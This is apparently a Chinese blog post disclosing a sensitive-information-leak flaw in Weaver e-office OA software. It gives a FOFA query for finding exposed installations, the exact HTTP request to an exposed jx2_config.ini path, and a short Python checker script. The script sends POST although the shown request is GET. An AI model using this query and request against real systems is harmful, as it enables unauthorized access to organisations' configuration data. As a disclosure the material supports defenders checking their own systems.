泛微e-office系统敏感信息泄露漏洞

本文介绍了泛微e-office协同OA软件中存在的敏感信息泄露漏洞,提供了Fofa查询语句和Python检测脚本,同时推荐用户关注官方更新补丁进行修复。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任

1、系统简介

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。

2、漏洞描述

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,该系统存在敏感信息泄露漏洞。

3、fofa查询语句

app="泛微-EOffice"

4、漏洞复现

漏洞链接: http://xxxxxxxx/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini

GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 
Connection: close

5、python检测脚本

import requests

def verify(ip):
    url = f'{ip}/building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini'

    headers = {
        'User-Agent': ' Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
        'Connection': 'close'
    }

    try:
        response = requests.post(url, headers=headers)
        # 验证成功输出相关信息
        if response.status_code == 200:
            print(f"{ip}存在泛微e-office系统敏感信息泄露漏洞!!!")
    except Exception as e:
        pass

if __name__ == '__main__':
    self = input('请输入目标主机IP地址:')
    verify(self)

6、修复意见

请关注官网更新补丁: https://www.e-office.cn/